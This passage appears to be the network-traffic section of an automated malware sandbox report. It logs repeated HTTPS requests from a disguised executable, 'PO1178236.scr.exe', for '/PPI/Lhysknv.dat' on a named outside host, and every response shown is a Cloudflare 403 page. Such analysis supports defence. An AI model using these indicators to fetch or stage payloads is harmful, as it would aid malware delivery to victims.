63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c3039bae5e64</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:37:23 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 33 30 33 39 62 61 65 35 65 36 34 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c3039bae5e64',t:'MTczNjQwODI0My4wMDAwMDA='};var
        2025-01-09 07:37:23 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        142192.168.2.949851188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:24 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:24 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:24 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:39 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wwJS4M0c3pQHOC1RRnsxTlzqM08Odd2CUReKFKjD4Wnblgv%2BY4sEVfbxGMu7mUPFxbldHqbbhvbwry6u2ZxWUZM%2BMUU%2FnZMZQLBL5rOkk6kmfUTv8Nla3p77BCa6BH7cGMZYetVbdwfdJa77"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c3076c4e9e04-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2039&min_rtt=2038&rtt_var=766&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1426477&cwnd=236&unsent_bytes=0&cid=52ff64dd433384e0&ts=154&x=0"
        2025-01-09 07:37:24 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:24 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:37:24 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:37:24 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 33 30 37 36 63 34 65 39 65 30 34 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c3076c4e9e04</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:37:24 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 33 30 37 36 63 34 65 39 65 30 34 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c3076c4e9e04',t:'MTczNjQwODI0NC4wMDAwMDA='};var a
        2025-01-09 07:37:24 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        143192.168.2.949852188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:25 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:25 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:25 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:40 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UeNOmqUPOaiLkVey9exIdcf0d085Alo2RKODcHBLmOlRJhzZSWAkHZpVHMuAXH6xc8HOhYV%2FJFxXVFXB1bhnjBMsnTr0MM3cVFXZL5b2jLzWVH3Ov11wv%2FFL0wpD9SIFyI%2FW%2BUcGZQdGL7Pb"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c30c3b397ca0-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1977&rtt_var=748&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1457813&cwnd=174&unsent_bytes=0&cid=23c2865aaee5d47e&ts=292&x=0"
        2025-01-09 07:37:25 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:25 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:37:25 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:37:25 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 33 30 63 33 62 33 39 37 63 61 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c30c3b397ca0</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:37:25 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 33 30 63 33 62 33 39 37 63 61 30 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c30c3b397ca0',t:'MTczNjQwODI0NS4wMDAwMDA='};var
        2025-01-09 07:37:25 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        144192.168.2.949853188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:25 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:25 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:25 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:40 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PVFxuSl0yJUMmskoUkYerxStlDod9fb2xW4a3dQuxRZwu6VivmwHiwco%2FUjNwiAV3YEpBA15ZJAgChRh8zXZMxAHCsfuEq3LpFXgdf%2BSZmdMASnye%2Fdu%2BAtAv5lV%2Bgyv0UtDr0hv9o1h8BS5"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c30fdde842d3-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1612&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1795817&cwnd=246&unsent_bytes=0&cid=884e6ecc0683f9b8&ts=121&x=0"
        2025-01-09 07:37:25 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:25 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:37:25 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:37:25 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 33 30 66 64 64 65 38 34 32 64 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c30fdde842d3</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:37:25 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 33 30 66 64 64 65 38 34 32 64 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c30fdde842d3',t:'MTczNjQwODI0NS4wMDAwMDA='};v
        2025-01-09 07:37:25 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        145192.168.2.949854188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:26 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:26 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:26 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
